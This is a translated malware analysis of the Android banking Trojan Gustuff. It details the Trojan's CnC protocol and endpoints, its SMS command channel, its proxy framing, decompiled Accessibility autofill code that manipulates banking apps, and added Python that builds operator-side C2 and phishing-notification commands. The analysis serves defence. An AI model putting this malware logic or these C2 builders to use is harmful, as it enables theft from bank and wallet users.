How the Android Trojan Gustuff skims the cream (fiat and crypto) off your accounts


The other day Group-IB reported on the activity of the Android mobile Trojan Gustuff. It operates exclusively in international markets, attacking customers of 100 major foreign banks, users of 32 mobile cryptocurrency wallets, and large e-commerce resources. The developer of Gustuff is a Russian-speaking cybercriminal operating under the nickname Bestoffer. Until recently he advertised his Trojan as "a serious product for people with knowledge and experience."

Ivan Pisarev, malicious code analyst at Group-IB, describes in his research in detail how Gustuff works and what danger it poses.

Who is Gustuff hunting?

Gustuff belongs to a new generation of malware with fully automated functions. According to the developer, the Trojan is a new, improved version of the AndyBot malware, which since November 2017 has attacked Android phones and stolen money through phishing web forms disguised as the mobile applications of well-known international banks and payment systems. Bestoffer stated that the rental price of the Gustuff Bot was $800 per month.

Analysis of the Gustuff sample showed that the Trojan potentially targets customers of the mobile applications of major banks such as Bank of America, Bank of Scotland, JPMorgan, Wells Fargo, Capital One, TD Bank and PNC Bank, as well as of the cryptocurrency wallets Bitcoin Wallet, BitPay, Cryptopay, Coinbase and others.

Originally created as a classic banking Trojan, in its current version Gustuff has considerably expanded its list of potential targets. In addition to the Android applications of banks, fintech companies and crypto services, Gustuff targets users of marketplace applications, online stores, payment systems and instant messengers: in particular PayPal, Western Union, eBay, Walmart, Skype, WhatsApp, Gett Taxi, Revolut and others.

Point of entry: built for mass infection

Gustuff uses the "classic" vector for getting onto Android smartphones: SMS mailings with links to an APK. Once an Android device is infected, Gustuff can, on the server's command, spread further through the contact list of the infected phone or through the server's own database. Gustuff's functionality is designed for mass infection and maximum return for its operators' business: it has a unique "autofill" function for legitimate mobile banking applications and cryptocurrency wallets, which allows the theft of money to be sped up and scaled.

Study of the Trojan showed that the autofill function is implemented through the Accessibility Service, the Android service intended for people with disabilities. Gustuff is not the first Trojan to successfully bypass protections against interaction with the window elements of other applications using this Android service. However, using the Accessibility Service in combination with an autofiller is still rare.

After being downloaded to the victim's phone, Gustuff uses the Accessibility Service to interact with the window elements of other applications (banking, cryptocurrency, online shopping, messaging and others), performing the actions the attackers need. For example, at the server's command the Trojan can press buttons and change the values of text fields in banking applications. The Accessibility Service mechanism lets the Trojan bypass the protections banks deployed against the previous generation of mobile Trojans, as well as the security policy changes Google introduced in newer versions of Android OS. Gustuff also "knows how" to disable Google Protect: according to the author, this function works in 70% of cases.


Gustuff can also display fake PUSH notifications carrying the icons of legitimate mobile applications. The user taps the PUSH notification and sees a phishing window downloaded from the server, where they enter the requested bank card or crypto wallet data. In another Gustuff scenario, the application on whose behalf the PUSH notification was shown is opened instead. In that case the malware, on command from the server and via the Accessibility Service, can fill in the fields of the banking application's form for a fraudulent transaction.

Gustuff's functionality also includes sending information about the infected device to the server, reading and sending SMS messages, sending USSD requests, launching a SOCKS5 proxy, following links, uploading files (including photographed documents, screenshots and photos) to the server, and resetting the phone to factory settings.

Malware analysis

Before the malicious application is installed, Android OS shows the user a window listing the permissions requested by Gustuff:

The application is installed only after the user gives consent. After the application starts, the Trojan shows the user a window:

It then removes its icon.

Gustuff is packed, according to the author, with a packer from FTT. After launch, the application periodically contacts the CnC server to receive commands. Several of the files we examined used the IP address 88.99.171[.]105 as the control server (hereafter denoted <%CnC%>).

After launch, the program starts sending requests to the server at http://<%CnC%>/api/v1/get.php.

The response is expected to be JSON in the following format:

{
    "results" : "OK",
    "command":{
        "id": "<%id%>",
        "command":"<%command%>",
        "timestamp":"<%Server Timestamp%>",
        "params":{
		<%Command parameters as JSON%>
        },
    },
}

With every request it sends information about the infected device. The message format is shown below. Note that the fields full, extra, apps and permission are optional and are sent only when a corresponding request command has arrived from the CnC.

{
    "info":
    {
        "info":
        {
            "cell":<%Sim operator name%>,
            "country":<%Country ISO%>,
            "imei":<%IMEI%>,
            "number":<%Phone number%>,
            "line1Number":<%Phone number%>,
            "advertisementId":<%ID%>
        },
        "state":
        {
            "admin":<%Has admin rights%>,
            "source":<%String%>,
            "needPermissions":<%Application needs permissions%>,
            "accesByName":<%Boolean%>,
            "accesByService":<%Boolean%>,
            "safetyNet":<%String%>,
            "defaultSmsApp":<%Default Sms Application%>,
            "isDefaultSmsApp":<%Current application is Default Sms Application%>,
            "dateTime":<%Current date time%>,
            "batteryLevel":<%Battery level%>
        },
        "socks":
        {
            "id":<%Proxy module ID%>,
            "enabled":<%Is enabled%>,
            "active":<%Is active%>
        },
        "version":
        {
            "versionName":<%Package Version Name%>,
            "versionCode":<%Package Version Code%>,
            "lastUpdateTime":<%Package Last Update Time%>,
            "tag":<%Tag, default value: "TAG"%>,
            "targetSdkVersion":<%Target Sdk Version%>,
            "buildConfigTimestamp":1541309066721
        },
    },
    "full":
    {
        "model":<%Device Model%>,
        "localeCountry":<%Country%>,
        "localeLang":<%Locale language%>,
        "accounts":<%JSON array, contains from "name" and "type" of accounts%>,
        "lockType":<%Type of lockscreen password%>
    },
    "extra":
    {
        "serial":<%Build serial number%>,
        "board":<%Build Board%>,
        "brand":<%Build Brand%>,
        "user":<%Build User%>,
        "device":<%Build Device%>,
        "display":<%Build Display%>,
        "id":<%Build ID%>,
        "manufacturer":<%Build manufacturer%>,
        "model":<%Build model%>,
        "product":<%Build product%>,
        "tags":<%Build tags%>,
        "type":<%Build type%>,
        "imei":<%imei%>,
        "imsi":<%imsi%>,
        "line1number":<%phonenumber%>,
        "iccid":<%Sim serial number%>,
        "mcc":<%Mobile country code of operator%>,
        "mnc":<%Mobile network codeof operator%>,
        "cellid":<%GSM-data%>,
        "lac":<%GSM-data%>,
        "androidid":<%Android Id%>,
        "ssid":<%Wi-Fi SSID%>
    },
    "apps":{<%List of installed applications%>},
    "permission":<%List of granted permissions%>
} 

Storing configuration data

Gustuff stores important operational information in a preference file. The file name, and the names of the parameters inside it, are the MD5 sum of the string 15413090667214.6.1<%name%>, where <%name%> is the original name. A Python rendering of the name-generation function:

    import hashlib

    def nameGenerator(input):
        # MD5 of the fixed prefix followed by the original name, as a hex string
        return hashlib.md5(("15413090667214.6.1" + input).encode()).hexdigest()

Hereafter we denote it as nameGenerator(input).
The name of the first file is therefore nameGenerator("API_SERVER_LIST"), and it contains values with the following names:

Variable name: Meaning
nameGenerator("API_SERVER_LIST"): Contains the list of CnC addresses as an array.
nameGenerator("API_SERVER_URL"): Contains the CnC address.
nameGenerator("SMS_UPLOAD"): Flag, set by default. If the flag is set, SMS messages are sent to the CnC.
nameGenerator("SMS_ROOT_NUMBER"): Phone number to which SMS messages received by the infected device are forwarded. Null by default.
nameGenerator("SMS_ROOT_NUMBER_RESEND"): Flag, unset by default. If set, an SMS received by the infected device is forwarded to the root number.
nameGenerator("DEFAULT_APP_SMS"): Flag, unset by default. If set, the application processes incoming SMS messages.
nameGenerator("DEFAULT_ADMIN"): Flag, unset by default. If set, the application has administrator rights.
nameGenerator("DEFAULT_ACCESSIBILITY"): Flag, unset by default. If set, the service that uses the Accessibility Service is running.
nameGenerator("APPS_CONFIG"): JSON object containing the list of actions to perform when an Accessibility event associated with a particular application fires.
nameGenerator("APPS_INSTALLED"): Stores the list of applications installed on the device.
nameGenerator("IS_FIST_RUN"): Flag reset on first run.
nameGenerator("UNIQUE_ID"): Contains a unique identifier, generated when the bot is first launched.

Server command processing module

The application stores the CnC server addresses as an array of Base85-encoded strings. The list of CnC servers can be changed when the corresponding command is received, in which case the addresses are saved to the preference file.

In response to a request, the server sends the application a command. Commands and their parameters are presented in JSON. The application can process the following commands:

Command: Description
forwardStart: Start sending SMS messages received by the infected device to the CnC server.
forwardStop: Stop sending SMS messages received by the infected device to the CnC server.
ussdRun: Execute a USSD request. The number to send the USSD request to is in the JSON field "number".
sendSms: Send a single SMS message (split into parts if necessary). As a parameter the command takes a JSON object with the fields "to" (destination number) and "body" (message body).
sendSmsAb: Send SMS messages (split into parts if necessary) to everyone in the contact list of the infected device. The interval between messages is 10 seconds. The message body is in the JSON field "body".
sendSmsMass: Send SMS messages (split into parts if necessary) to the contacts specified in the command parameters. The interval between messages is 10 seconds. As a parameter the command takes a JSON array (field "sms") whose elements contain the fields "to" (destination number) and "body" (message body).
changeServer: The command takes as a parameter either a value under the key "url", in which case the bot changes the value of nameGenerator("SERVER_URL"), or "array", in which case the bot writes the array to nameGenerator("API_SERVER_LIST"). This is how the application changes its CnC server addresses.
adminNumber: The command works with the root number. It accepts a JSON object with the following parameters: "number" changes nameGenerator("ROOT_NUMBER") to the received value, "resend" changes nameGenerator("SMS_ROOT_NUMBER_RESEND"), "sendId" sends the uniqueID to nameGenerator("ROOT_NUMBER").
updateInfo: Send information about the infected device to the server.
wipeData: The command destroys user data. Depending on the name under which the application was launched, either all data is erased and the device rebooted (primary user) or only the user's data is erased (secondary user).
socksStart: Start the Proxy module. The module is described in a separate section.
socksStop: Stop the Proxy module.
openLink: Follow a link. The link is in the JSON parameter under the key "url". "android.intent.action.VIEW" is used to open it.
uploadAllSms: Send all SMS messages received by the device to the server.
uploadAllPhotos: Upload images from the infected device to a URL. The URL comes as a parameter.
uploadFile: Upload a file from the infected device to a URL. The URL comes as a parameter.
uploadPhoneNumbers: Send phone numbers from the contact list to the server. If a JSON object with the key "ab" arrives as a parameter, the application takes the contacts from the phone book. If a JSON object with the key "sms" arrives, the application takes the contacts from the senders of SMS messages.
changeArchive: The application downloads a file from the address given in the parameter under the key "url". The downloaded file is saved as "archive.zip". The application then unzips it, using the archive password "b5jXh37gxgHBrZhQ4j3D" if required. The unpacked files are saved in the [external storage]/hgps directory. This is where the application stores its web fakes (described below).
actions: The command works with the ActionsService, described in a separate section.
test: Does nothing.
download: The command downloads a file from a remote server and saves it in the "Downloads" directory. The URL and file name come as fields of the JSON parameter object, "url" and "fileName" respectively.
remove: Deletes a file from the "Downloads" directory. The file name comes in the JSON parameter under the key "fileName". The default file name is "tmp.apk".
notification: Show a notification whose description and title texts are specified by the control server.

Format of the notification command:

{
    "results" : "OK",
    "command":{
    "id": <%id%>,
    "command":"notification",
    "timestamp":<%Server Timestamp%>,
    "params":{
        "openApp":<%Open original app or not%>,
        "array":[
                      {"title":<%Title text%>,
                      "desc":<%Description text%>,
                      "app":<%Application name%>}
                   ]
                   },
        },
}

The notification generated by the sample looks identical to notifications generated by the application named in the app field. If openApp is True, tapping the notification launches the application named in the app field. If openApp is False, then one of the following happens:

  • a phishing window opens whose contents are loaded from the directory <%external storage%>/hgps/<%filename%>
  • a phishing window opens whose contents are loaded from the server at <%url%>?id=<%Bot id%>&app=<%Application name%>
  • a phishing window disguised as a Google Play card opens, offering to enter card details.

The application sends the result of every command to <%CnC%>/api/v1/set_state.php as a JSON object in the following format:

{
    "command":
    {
        "command":<%command%>,
        "id":<%command_id%>,
        "state":<%command_state%>
    }
    "id":<%bot_id%>
}
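The polling exchange described above (a get.php response carrying a command, answered with a set_state.php report) is shown below with both sides in code. This is an added example written for this article, not code from the sample or from Group-IB: a minimal fake-C2 builder and the bot-side parser one would use to drive the sample in a sandbox. The command names are those in the table above; the values used in the "state" field are an assumption, since the page gives the field but not its vocabulary.

```python
import json

# Command names from the table above; anything else is treated as unknown.
KNOWN_COMMANDS = frozenset([
    "forwardStart", "forwardStop", "ussdRun", "sendSms", "sendSmsAb", "sendSmsMass",
    "changeServer", "adminNumber", "updateInfo", "wipeData", "socksStart", "socksStop",
    "openLink", "uploadAllSms", "uploadAllPhotos", "uploadFile", "uploadPhoneNumbers",
    "changeArchive", "actions", "test", "download", "remove", "notification",
])


def build_get_response(cmd_id, command, params, timestamp):
    """Server side: the JSON body get.php returns when a command is queued."""
    return json.dumps({
        "results": "OK",
        "command": {"id": str(cmd_id), "command": command,
                    "timestamp": str(timestamp), "params": params},
    })


def notification_params(open_app, entries):
    """Parameters of a 'notification' command: openApp plus an array of
    {title, desc, app} objects (field names taken from the format above)."""
    for entry in entries:
        if set(entry) != {"title", "desc", "app"}:
            raise ValueError("notification entry must have exactly title, desc, app")
    return {"openApp": bool(open_app), "array": list(entries)}


def parse_get_response(text):
    """Bot side: validate a get.php response and return (cmd_id, command, params),
    or None if the server sent nothing usable (bad JSON, results != OK, no command)."""
    try:
        doc = json.loads(text)
    except ValueError:
        return None
    if not isinstance(doc, dict) or doc.get("results") != "OK":
        return None
    cmd = doc.get("command")
    if not isinstance(cmd, dict) or "id" not in cmd:
        return None
    name = cmd.get("command")
    if not isinstance(name, str):
        return None
    params = cmd.get("params")
    return str(cmd["id"]), name, params if isinstance(params, dict) else {}


def build_set_state(bot_id, cmd_id, command, state):
    """Bot side: the result object posted to set_state.php (format above).
    The 'state' strings are this example's assumption, not values from the sample."""
    return json.dumps({"command": {"command": command, "id": cmd_id, "state": state},
                       "id": bot_id})


def parse_set_state(text):
    """Server side: read back (bot_id, cmd_id, command, state) from a set_state.php post."""
    doc = json.loads(text)
    cmd = doc["command"]
    return doc["id"], cmd["id"], cmd["command"], cmd["state"]


def run_exchange(bot_id, response_text):
    """One polling cycle: parse the get.php answer and return the set_state.php
    report the bot would send back, or None if the answer carried no command."""
    parsed = parse_get_response(response_text)
    if parsed is None:
        return None
    cmd_id, name, _params = parsed
    state = "done" if name in KNOWN_COMMANDS else "unsupported"  # assumed vocabulary
    return build_set_state(bot_id, cmd_id, name, state)
```

A sandbox operator would serve build_get_response() from a fake get.php and log what parse_set_state() yields from the sample's posts; the bot-side functions exist only to show that the two halves round-trip.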

ActionsService
The list of commands the application processes includes actions. When this command is received, the command-processing module hands it to this service to execute the extended command. The service takes a JSON object as its parameter and can execute the following commands:

1. PARAMS_ACTION - on receiving this command, the service first reads the value of the Type key from the JSON parameter, which can be one of the following:

  • serviceInfo - the subcommand reads the value of the key includeNotImportant from the JSON parameter. If the flag is True, the application sets the FLAG_ISOLATED_PROCESS flag on the service that uses the Accessibility Service, so that the service is started in a separate process.
  • root - obtain and send to the server information about the currently focused window. The application obtains it through the AccessibilityNodeInfo class.
  • admin - request administrator rights.
  • delay - suspend the ActionsService for the number of milliseconds given in the parameter's "data" key.
  • windows - send the list of windows visible to the user.
  • install - install an application on the infected device. The package file name is in the "fileName" key; the file itself is located in the Downloads directory.
  • global - the subcommand navigates away from the current window:
    • to the Quick Settings menu
    • back
    • home
    • to the notifications
    • to the recently opened applications window

  • launch - launch an application. The application name comes as a parameter under the key data.
  • sounds - switch the sound mode to silent.
  • unlock - turns on the screen backlight and keyboard at full brightness. The application does this through a WakeLock, using the string [Application Label]:INFO as the tag.
  • permissionOverlay - not implemented (the response to the command is {"message":"Not supported"} or {"message":"low sdk"})
  • gesture - not implemented (the response to the command is {"message":"Not supported"} or {"message":"Low API"})
  • permissions - this command is intended to request permissions for the application. However, the requesting function is not implemented, so the command has no effect. The list of requested permissions comes as a JSON array under the key "permissions". The standard list:
    • android.permission.READ_PHONE_STATE
    • android.permission.READ_CONTACTS
    • android.permission.CALL_PHONE
    • android.permission.RECEIVE_SMS
    • android.permission.SEND_SMS
    • android.permission.READ_SMS
    • android.permission.READ_EXTERNAL_STORAGE
    • android.permission.WRITE_EXTERNAL_STORAGE

  • open - show a phishing window. Depending on the parameter from the server, the application can show one of the following:
    • a phishing window whose contents are loaded from a file in the directory <%external storage%>/hgps/<%param_fileName%>. The result of the user's interaction with the window is sent to <%CnC%>/records.php
    • a phishing window whose contents are preloaded from the address <%url_param%>?id=<%bot_id%>&app=<%packagename%>. The result of the user's interaction with the window is sent to <%CnC%>/records.php
    • a phishing window disguised as a Google Play card.

  • interactive - the command interacts with the window elements of other applications through the AccessibilityService. A separate service is implemented for this interaction. The sample can interact with windows that are:
    • currently active. In this case the parameter contains the id or the text (name) of the object to interact with.
    • visible to the user at the moment the command is executed. The application selects such windows by id.

    Having obtained the AccessibilityNodeInfo objects for the window elements of interest, the application, depending on the parameter, can perform the following actions:

    • focus - set focus on the object.
    • click - click the object.
    • actionId - perform an action by its ID.
    • setText - change the text of the object. This is done in one of two ways: by performing ACTION_SET_TEXT (if the Android version of the infected device is LOLLIPOP or newer, which matches the SDK_INT >= 21 check in the code below), or by placing the string on the clipboard and pasting it into the object (on older versions). This command can be used to change data in a banking application.

2. PARAMS_ACTIONS - the same as PARAMS_ACTION, except that an array of JSON commands arrives.

Many readers will be curious what the function that interacts with another application's window elements looks like. This is how that functionality is implemented in Gustuff (decompiled and lightly cleaned up; the action codes are the AccessibilityNodeInfo constants):

// Applies one "interactive" sub-command to the AccessibilityNodeInfo objects that matched
// the requested window element. Returns true if at least one performAction() succeeded;
// the number of successes is reported back to the server in the "res" field.
boolean interactiveAction(List<AccessibilityNodeInfo> aiList, JSONObject action, JsonObject res) {
    int repeat = action.optInt("repeat", 1);   // how many times to apply the action to each node
    int count = 0;                             // number of successful performAction() calls
    for (AccessibilityNodeInfo ani : aiList) {
        for (int index = 1; index <= repeat; ++index) {
            if (action.has("focus")) {
                if (ani.performAction(AccessibilityNodeInfo.ACTION_FOCUS)) {   // 1
                    ++count;
                }
            } else if (action.has("click")) {
                if (ani.performAction(AccessibilityNodeInfo.ACTION_CLICK)) {   // 16
                    ++count;
                }
            } else if (action.has("actionId")) {
                if (ani.performAction(action.optInt("actionId"))) {           // arbitrary action id from the server
                    ++count;
                }
            } else if (action.has("setText")) {
                Context context = this.getApplicationContext();
                String text = action.optString("setText");
                if (performSetTextAction(context, ani, text)) {
                    ++count;
                }
            }
        }
        ani.recycle();
    }
    res.addProperty("res", count);
    return count > 0;
}

The text-changing function:

// Sets a node's text: directly via ACTION_SET_TEXT on Lollipop (API 21) and newer,
// otherwise by putting the string on the clipboard and pasting it into the field.
boolean performSetTextAction(Context context, AccessibilityNodeInfo ani, String text) {
    boolean result;
    if (Build.VERSION.SDK_INT >= 21) {
        Bundle b = new Bundle();
        b.putCharSequence(AccessibilityNodeInfo.ACTION_ARGUMENT_SET_TEXT_CHARSEQUENCE, text);
        result = ani.performAction(AccessibilityNodeInfo.ACTION_SET_TEXT, b);   // 0x200000
    } else {
        ClipboardManager clipboard = (ClipboardManager) context.getSystemService(Context.CLIPBOARD_SERVICE);
        if (clipboard != null) {
            clipboard.setPrimaryClip(ClipData.newPlainText("autofill_pm", text));
            result = ani.performAction(AccessibilityNodeInfo.ACTION_PASTE);    // 0x8000
        } else {
            result = false;
        }
    }
    return result;
}

With a correctly configured control server, Gustuff can therefore fill in the text fields of a banking application and press the buttons needed to complete a transaction. The Trojan does not even need to log in to the application: it is enough to send a command showing a PUSH notification and then open the banking application already installed on the device. The user authenticates themselves, after which Gustuff can perform the autofill.

SMS message processing module

The application registers a handler for the event of the infected device receiving an SMS. The sample can receive commands from the operator in the body of an SMS message. Commands have the form:

7!5=<%Base64-encoded command%>

The application searches every incoming SMS for the string 7!5=; when it is found, the text is Base64-decoded starting at offset 4 and the command is executed. The commands are the same as those from the CnC. The result of execution is sent to the number the command came from. Response format:

7*5=<%Base64 encoding of "result_code command"%>

Optionally, the application can forward every received message to the root number. For that, the root number must be set in the preference file and the forwarding flag must be enabled. The SMS is forwarded to the attacker's number in the format:

<%From number%> - <%Time, format: dd/MM/yyyy HH:mm:ss%> <%SMS body%>

Also optionally, the application can send messages to the CnC. The SMS is sent to the server as JSON:

{
    "id":<%BotID%>,
    "sms":
    {
        "text":<%SMS body%>,
        "number":<%From number%>,
        "date":<%Timestamp%>
    }
}

If the nameGenerator("DEFAULT_APP_SMS") flag is set, the application aborts processing of the SMS message and clears the list of incoming messages.
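The SMS control channel just described (7!5= commands, 7*5= replies, and the forwarding format) is small enough to implement end to end, which is useful when triaging SMS pulled from an infected device or when reproducing the operator's side in a lab. The following is an added example for this article, not code from the sample or from Group-IB. It assumes the Base64 payload runs from offset 4 to the end of the message, which the page does not state, and the sample messages are constructed, not captured.

```python
import base64
import binascii
from datetime import datetime

CMD_PREFIX = "7!5="     # marker the bot looks for in incoming SMS bodies
REPLY_PREFIX = "7*5="   # marker of the bot's reply to the sender


def extract_sms_command(body):
    """Return the decoded command if the SMS body carries a 7!5= command, else None.
    The Base64 payload starts 4 characters after the marker; it is assumed to run
    to the end of the message. Anything that is not valid Base64 is ignored."""
    idx = body.find(CMD_PREFIX)
    if idx < 0:
        return None
    payload = body[idx + len(CMD_PREFIX):].strip()
    try:
        return base64.b64decode(payload, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None


def build_sms_reply(result_code, command):
    """Reply the bot sends to the command's sender: 7*5= + Base64("result_code command")."""
    return REPLY_PREFIX + base64.b64encode(f"{result_code} {command}".encode()).decode()


def parse_sms_reply(body):
    """Operator side: recover (result_code, command) from a 7*5= reply, else None."""
    if not body.startswith(REPLY_PREFIX):
        return None
    try:
        decoded = base64.b64decode(body[len(REPLY_PREFIX):], validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    code, _, command = decoded.partition(" ")
    return code, command


def format_forwarded_sms(from_number, when, body):
    """Line format used when forwarding an intercepted SMS to the root number."""
    return f"{from_number} - {when.strftime('%d/%m/%Y %H:%M:%S')} {body}"


def find_command_messages(messages):
    """Triage helper over captured SMS (dicts with 'from' and 'body'): returns
    (sender, decoded command) for each message that carries a 7!5= command."""
    hits = []
    for msg in messages:
        cmd = extract_sms_command(msg["body"])
        if cmd is not None:
            hits.append((msg["from"], cmd))
    return hits


# Constructed sample traffic for demonstration, not captured data.
SAMPLE_SMS = [
    {"from": "+10000000001", "body": "Your parcel is waiting: http://example.invalid/track"},
    {"from": "+10000000002", "body": CMD_PREFIX + base64.b64encode(b"updateInfo").decode()},
    {"from": "+10000000003", "body": "7!5=not*base64"},
]
```

Run find_command_messages() over an SMS dump exported from a device under investigation to separate operator commands from ordinary traffic; the third sample message shows why the decoder must tolerate a marker followed by garbage.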

Proxy module

The sample contains a Backconnect Proxy module (hereafter the Proxy module), implemented as a separate class with static fields holding its configuration. The configuration data is stored in the sample in clear text.

Every action of the Proxy module is logged to files. For this, the application creates a directory named "logs" in external storage (the ProxyConfigClass.logsDir field of the configuration class) where the log files are kept. Logging goes to files with the following names:

  1. main.txt - the work of the class named CommandServer is logged here. Hereafter, logging a string str to this file is denoted mainLog(str).
  2. session-<%id%>.txt - holds the log data associated with a particular proxy session. Hereafter denoted sessionLog(str).
  3. server.txt - used to log all data written to the files above.

Log record format:

<%Date%> [Thread[<%thread id%>], id[]]: log string

Exceptions raised while the Proxy module runs are also written to a file. For this, the application builds a JSON object of the following format:

{
    "uncaughtException":<%short description of throwable%>
    "thread":<%thread%>
    "message":<%detail message of throwable%>
    "trace":        //Stack trace info
        [
            {
                "ClassName":
                "FileName":
                "LineNumber":
                "MethodName":
            },
            {
                "ClassName":
                "FileName":
                "LineNumber":
                "MethodName":
            }
        ]
}

It then converts it to a string and logs it.

The Proxy module starts after the corresponding command is received. On that command the application starts a service named MainService, which is responsible for managing the Proxy module: starting and stopping it.

Stages of starting the service:

1. It starts a timer that fires once a minute and checks whether the Proxy module is active; if not, it starts it. The Proxy module is also started when the android.net.conn.CONNECTIVITY_CHANGE event fires.

2. The application creates a wake lock with the PARTIAL_WAKE_LOCK flag and acquires it. This keeps the device CPU from going to sleep.

3. It starts the Proxy module's command-processing class, first logging the line mainLog("start server") and

Server::start() host[<%proxy_cnc%>], commandPort[<%command_port%>], proxyPort[<%proxy_port%>]

where proxy_cnc, command_port and proxy_port are parameters taken from the Proxy server configuration.

The command-processing class is called CommandConnection. Immediately after start it performs the following actions:

4. It connects to ProxyConfigClass.host:ProxyConfigClass.commandPort and sends data about the infected device there in JSON format:

{
    "id":<%id%>,
    "imei":<%imei%>,
    "imsi":<%imsi%>,
    "model":<%model%>,
    "manufacturer":<%manufacturer%>,
    "androidVersion":<%androidVersion%>,
    "country":<%country%>,
    "partnerId":<%partnerId%>,
    "packageName":<%packageName%>,
    "networkType":<%networkType%>,
    "hasGsmSupport":<%hasGsmSupport%>,
    "simReady":<%simReady%>,
    "simCountry":<%simCountry%>,
    "networkOperator":<%networkOperator%>,
    "simOperator":<%simOperator%>,
    "version":<%version%>
}

Where:

  • id: identifier; the module tries to read the "id" field from the Shared Preferences file named "x". If the value cannot be obtained, a new one is generated. The Proxy module thus has its own identifier, generated in the same way as the Bot ID.
  • imei: IMEI of the device. If an error occurs while obtaining the value, the error text is written to this field instead.
  • imsi: International Mobile Subscriber Identity of the device. If an error occurs while obtaining the value, the error text is written to this field instead.
  • model: end-user-visible name of the product.
  • manufacturer: manufacturer of the product/hardware (Build.MANUFACTURER).
  • androidVersion: string of the form "<%release_version%> (<%os_version%>),<%sdk_version%>"
  • country: current locale of the device.
  • partnerId: empty string.
  • packageName: package name.
  • networkType: type of the current network connection (for example "WIFI", "MOBILE"). On error, null.
  • hasGsmSupport: true if the phone supports GSM, otherwise false.
  • simReady: SIM card state.
  • simCountry: ISO country code (based on the SIM card provider).
  • networkOperator: operator name. If an error occurs while obtaining the value, the error text is written to this field instead.
  • simOperator: Service Provider Name (SPN). If an error occurs while obtaining the value, the error text is written to this field instead.
  • version: this field is stored in the configuration class.

5. It switches to waiting for commands from the server. Commands from the server arrive in the form:

  • offset 0 - command
  • offset 1 - sessionId
  • offset 2 - length
  • offset 4 - data

When a command arrives, the application logs:
mainLog("Header { sessionId[<%id%>], type[<%command%>], length[<%length%>] }")

The following commands from the server are possible:

Name: command code, data, description
connectionId: 0, connection ID, create a new connection
SLEEP: 3, time, pause the Proxy module
PING_PONG: 4, no data, send a PONG message

The PONG message is 4 bytes long and looks like this: 0x04000000.
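The command-channel framing above (1-byte command, 1-byte sessionId, 2-byte length, then data; PONG = 0x04000000) is the kind of thing one codifies while writing a traffic decoder or a fake command server for the module. Below is an added example written for this article, not code from the sample or from Group-IB. The page does not state the byte order of the length field, so network (big-endian) order is an assumption; the PONG bytes are consistent with either order since its length is zero. The sample stream at the end is constructed.

```python
import struct
from collections import namedtuple

# Frame layout from the description above: command (1 byte), sessionId (1 byte),
# length (2 bytes), then `length` bytes of data. Big-endian length is an assumption.
HEADER = struct.Struct(">BBH")
Frame = namedtuple("Frame", "command session_id data")

CMD_CONNECTION_ID = 0   # create a new proxied connection
CMD_SLEEP = 3           # pause the Proxy module
CMD_PING_PONG = 4       # keep-alive, answered with a PONG


def build_frame(command, session_id, data=b""):
    """Serialise one command frame."""
    if len(data) > 0xFFFF:
        raise ValueError("data does not fit the 2-byte length field")
    return HEADER.pack(command, session_id, len(data)) + data


def pong():
    """The 4-byte PONG message 0x04000000: command 4, session 0, no data."""
    return build_frame(CMD_PING_PONG, 0)


def parse_frames(buf):
    """Split a byte stream into complete frames. Returns (frames, leftover) so that a
    partial frame at the tail of a TCP read can be kept until more bytes arrive."""
    frames = []
    off = 0
    while len(buf) - off >= HEADER.size:
        command, session_id, length = HEADER.unpack_from(buf, off)
        end = off + HEADER.size + length
        if end > len(buf):
            break  # incomplete frame
        frames.append(Frame(command, session_id, bytes(buf[off + HEADER.size:end])))
        off = end
    return frames, bytes(buf[off:])


def header_log_line(frame):
    """Reproduce the bot's mainLog() header line for a received frame."""
    return "Header { sessionId[%d], type[%d], length[%d] }" % (
        frame.session_id, frame.command, len(frame.data))


def respond(frame):
    """What the bot writes back on the command socket: a PONG for PING_PONG. The
    page describes connectionId and SLEEP as acted on locally (a new ProxyConnection,
    a pause), so no reply on this channel is assumed for them."""
    if frame.command == CMD_PING_PONG:
        return pong()
    return None


# Constructed stream: a PING_PONG, a connectionId carrying a 4-byte id, then a
# truncated header that must be held back as leftover.
SAMPLE_STREAM = pong() + build_frame(CMD_CONNECTION_ID, 9, b"\x00\x00\x00\x2a") + b"\x03\x01"
```

Feeding a pcap's command-port payload through parse_frames() and header_log_line() gives output that can be compared line by line with the module's main.txt, which is a quick way to confirm the length byte order assumed here.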

When the connectionId command (create a new connection) is received, CommandConnection creates an instance of the ProxyConnection class.

  • Two classes take part in proxying: ProxyConnection and end. When a ProxyConnection is created, it connects to ProxyConfigClass.host:ProxyConfigClass.proxyPort and passes a JSON object:

 {
    "id":<%connectionId%>
}

In response, the server sends a SOCKS5 message containing the address of the remote server with which a connection must be established. Communication with that server goes through the end class.


Network communication

To hinder analysis of its traffic on the network, the communication between the CnC server and the application can be protected with SSL. All data sent to and from the server is in JSON format. During operation the application makes the following requests:

  • http://<%CnC%>/api/v1/set_state.php - result of command execution.
  • http://<%CnC%>/api/v1/get.php - receiving a command.
  • http://<%CnC%>/api/v1/load_sms.php - uploading SMS messages from the infected device.
  • http://<%CnC%>/api/v1/load_ab.php - uploading the contact list from the infected device.
  • http://<%CnC%>/api/v1/aevents.php - requested when the parameters stored in the preference file are updated.
  • http://<%CnC%>/api/v1/set_card.php - uploading data captured by the phishing window disguised as the Google Play Market.
  • http://<%CnC%>/api/v1/logs.php - uploading log data.
  • http://<%CnC%>/api/v1/records.php - uploading data captured through phishing windows.
  • http://<%CnC%>/api/v1/set_error.php - reporting an error that occurred.

Recommendations

To protect their customers from mobile Trojans, companies need comprehensive solutions that make it possible to monitor and block malicious activity without installing additional software on users' devices.

For this, signature-based detection of mobile Trojans must be reinforced with technologies that analyse the behaviour of both the customer and the application itself. Protection should include device identification based on digital fingerprinting, which makes it possible to tell when an account is being used from an atypical device that has already fallen into a fraudster's hands.

A fundamentally important point is cross-channel analysis, which lets companies manage the risks arising not only on the web but also in the mobile channel, for example in mobile banking applications, in cryptocurrency transactions and anywhere else a financial transaction can be performed.

Security rules for users:

  • do not install mobile applications on Android OS from any source other than Google Play, and pay particular attention to the permissions an application requests;
  • install Android OS updates regularly;
  • pay attention to the extensions of downloaded files;
  • do not visit suspicious resources;
  • do not click links received in SMS messages.

Semyon Rogachev, junior malware research specialist at the Group-IB Computer Forensics Laboratory, also took part in the research.

Source: www.habr.com
